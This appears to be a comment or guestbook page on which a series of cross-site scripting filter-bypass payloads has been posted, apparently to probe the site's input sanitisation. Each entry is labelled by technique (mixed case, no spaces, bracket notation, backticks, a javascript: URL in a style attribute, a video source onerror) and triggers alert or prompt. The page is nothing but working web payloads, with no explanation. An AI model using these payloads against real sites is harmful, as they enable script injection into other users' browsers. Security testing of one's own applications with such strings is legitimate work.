| test_user: 2026-06-26 11:00:58 |
|
| test message |
| bypass_style: 2026-06-26 10:00:23 |
|
| <div style="background:url(javascript:alert(1))"> |
| bypass_video: 2026-06-26 10:00:22 |
|
| <video><source onerror=alert(1)> |
| bypass_bracket notation: 2026-06-26 10:00:22 |
|
| <img src=x onerror=window["al"+"ert"](1)> |
| bypass_mixedcase: 2026-06-26 10:00:22 |
|
| <img src=x OnErRoR=alert(1)> |
| bypass_no spaces: 2026-06-26 10:00:21 |
|
| <img/src=x/onerror=alert(1)> |
| bypass_uppercase: 2026-06-26 10:00:21 |
|
| <IMG SRC=X ONERROR=ALERT(1)> |
| bypass_prompt backtick: 2026-06-26 10:00:20 |
|
| <img src=1 onerror=prompt`XSS`> |
| bypass_htmlentity: 2026-06-26 10:00:20 |
|
| <img src=1 onerror=alert(1)> |
| bypass_backtick: 2026-06-26 10:00:20 |
|
| <img src=1 onerror=alert`1`> |